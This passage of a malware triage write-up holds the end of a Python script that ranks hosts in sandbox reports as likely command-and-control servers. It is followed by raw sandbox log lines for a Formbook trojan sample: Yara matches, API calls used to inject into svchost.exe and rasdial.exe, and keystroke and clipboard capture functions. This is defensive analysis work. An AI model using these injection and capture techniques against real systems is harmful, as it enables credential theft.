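    "https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=",
    "Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004546000.sdmp, rasdial.exe, "
    "00000006.00000002.3531860991.0000000006236000.sdmpString found in binary or memory: https://tilda.cc",
    "Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.sdmpString found in binary or memory: "
    "https://login.live.com/oauth20_desktop.srf?lc=1033",
]

_ROW_RE = re.compile(r"^Source: (?P<src>.*?)String found in binary or memory: (?P<str>\S+)$")
_PROC_RE = re.compile(r"\b([\w-]+\.exe)\b")
_URL_SPLIT_RE = re.compile(r"(?=https?://)")          # memory strings often fuse two URLs
_C2_PATH_RE = re.compile(r"^/[a-z0-9]{3,5}/$")         # heuristic: short single-directory path
_ASSET_RE = re.compile(r"\.(css|js|jpe?g|png|gif|ico)$|/wp-(content|includes|json)/|/feed/|xmlrpc\.php")
_SEARCH_TEMPLATE_RE = re.compile(r"[?&](q|command|query)=$|/newtab/?$|/chrome_newtab$")


def parse_rows(rows):
    """Yield (process names, url) for every URL in the given report rows."""
    for row in rows:
        m = _ROW_RE.match(row)
        if not m:
            continue
        procs = tuple(sorted(set(_PROC_RE.findall(m.group("src")))))
        for url in filter(None, _URL_SPLIT_RE.split(m.group("str"))):
            yield procs, url


def classify_url(url):
    """Coarse class for one URL; triage() decides how the classes of a host combine."""
    parts = urlsplit(url)
    if not parts.path.strip("/") and not parts.query:
        return "root"
    if _ASSET_RE.search(parts.path):
        return "page_residue"                 # theme assets, feeds, WordPress endpoints
    if _SEARCH_TEMPLATE_RE.search(url):
        return "browser_search_template"      # browser profile data, not sample traffic
    params = [p for p in parts.query.split("&") if p]
    if _C2_PATH_RE.match(parts.path) and len(params) in (0, 2):
        return "short_path"                   # check-in directory, optionally a 2-param beacon
    return "other"


def triage(rows):
    """Group URLs by host and give each host a verdict from the combined classes."""
    hosts = defaultdict(lambda: {"urls": [], "procs": set(), "classes": set()})
    for procs, url in parse_rows(rows):
        e = hosts[urlsplit(url).hostname or "?"]
        e["urls"].append(url)
        e["procs"].update(procs)
        e["classes"].add(classify_url(url))
    result = {}
    for host, e in hosts.items():
        c = e["classes"]
        if "short_path" in c and c <= {"short_path", "root"}:
            verdict = "c2_candidate"          # only ever seen with the short path (or bare root)
        elif "browser_search_template" in c:
            verdict = "browser_data_residue"
        elif "page_residue" in c:
            verdict = "web_page_residue"      # demotes hosts whose short path sits beside real content
        else:
            verdict = "review"
        result[host] = {"verdict": verdict, "urls": sorted(set(e["urls"])), "procs": sorted(e["procs"])}
    return result


def c2_candidates(rows):
    return sorted(h for h, e in triage(rows).items() if e["verdict"] == "c2_candidate")


if __name__ == "__main__":
    for host, e in sorted(triage(SAMPLE_ROWS).items()):
        print(f"{e['verdict']:22} {host:24} {', '.join(e['procs'])}")
```

            The host-level rule is the point of the example: in this report the genuine candidates are referenced by nothing except the short path (and, for anaidittrich.com, the bare hostname), while every decoy or residue host also carries ordinary site content. Hosts that end up as "review" (tilda.cc, login.live.com) are neither cleared nor promoted and should be checked against the HTTP traffic rows rather than trusted either way.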
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E6425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E6425A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E64458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E64458
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E50219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E50219
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E7CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E7CDAC

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00DF3B4C This is a third-party compiled AutoIt script.
            Source: 20-EM-00- PI-INQ-3001.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_dd06b72d-d
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_0f0a8c36-d
            Source: 20-EM-00- PI-INQ-3001.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_710c951e-9
            Source: 20-EM-00- PI-INQ-3001.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_cd768ba6-8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C1A3 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03874340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03874650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03873090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03873010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03873D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03873D70 NtOpenThread
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A74650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A74340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A739B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A72B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A73090 NtSetValueKey
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A73010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A73D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04A73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_02A28FF0 NtDeleteFile
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_02A28F00 NtReadFile
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_02A28DA0 NtCreateFile
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_02A29090 NtClose
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_02A291E0 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E540B1 CreateFileW,_memset,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E48858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E5545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DFE8000_2_00DFE800
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1DBB50_2_00E1DBB5
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DFFE400_2_00DFFE40
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E7804A0_2_00E7804A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DFE0600_2_00DFE060
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E041400_2_00E04140
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E124050_2_00E12405
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E265220_2_00E26522
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E706650_2_00E70665
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E2267E0_2_00E2267E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E068430_2_00E06843
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1283A0_2_00E1283A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E289DF0_2_00E289DF
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E70AE20_2_00E70AE2
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E26A940_2_00E26A94
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E08A0E0_2_00E08A0E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E4EB070_2_00E4EB07
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E58B130_2_00E58B13
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1CD610_2_00E1CD61
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E270060_2_00E27006
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E031900_2_00E03190
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E0710E0_2_00E0710E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF12870_2_00DF1287
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E133C70_2_00E133C7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1F4190_2_00E1F419
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E116C40_2_00E116C4
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E056800_2_00E05680
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E058C00_2_00E058C0
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E178D30_2_00E178D3
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E11BB80_2_00E11BB8
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E29D050_2_00E29D05
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1BFE60_2_00E1BFE6
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E11FD00_2_00E11FD0
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00FF35E00_2_00FF35E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183631_2_00418363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010CF1_2_004010CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010D01_2_004010D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029ED1_2_004029ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029F01_2_004029F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012801_2_00401280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC7B1_2_0040FC7B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC831_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165431_2_00416543
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E901_2_00402E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FEA31_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E7431_2_0042E743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF231_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F01_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039003E61_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA3521_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C02C01_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E02741_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F41A21_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039001AA1_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F81CC1_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038301001_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA1181_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C81581_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D20001_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C01_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038647501_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038407701_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C6E01_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039005911_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038405351_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EE4F61_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E44201_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F24461_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F6BD71_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB401_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA801_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A01_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390A9A61_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038569621_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038268B81_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E8F01_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384A8401_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038428401_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BEFA01_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832FC81_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03882F281_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860F301_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E2F301_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4F401_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852E901_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FCE931_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEEDB1_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEE261_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840E591_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03858DBF1_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383ADE01_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384AD001_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DCD1F1_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0CB51_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830CF21_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840C001_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0388739A1_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F132D1_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382D34C1_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038452A01_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B2C01_2_0385B2C0
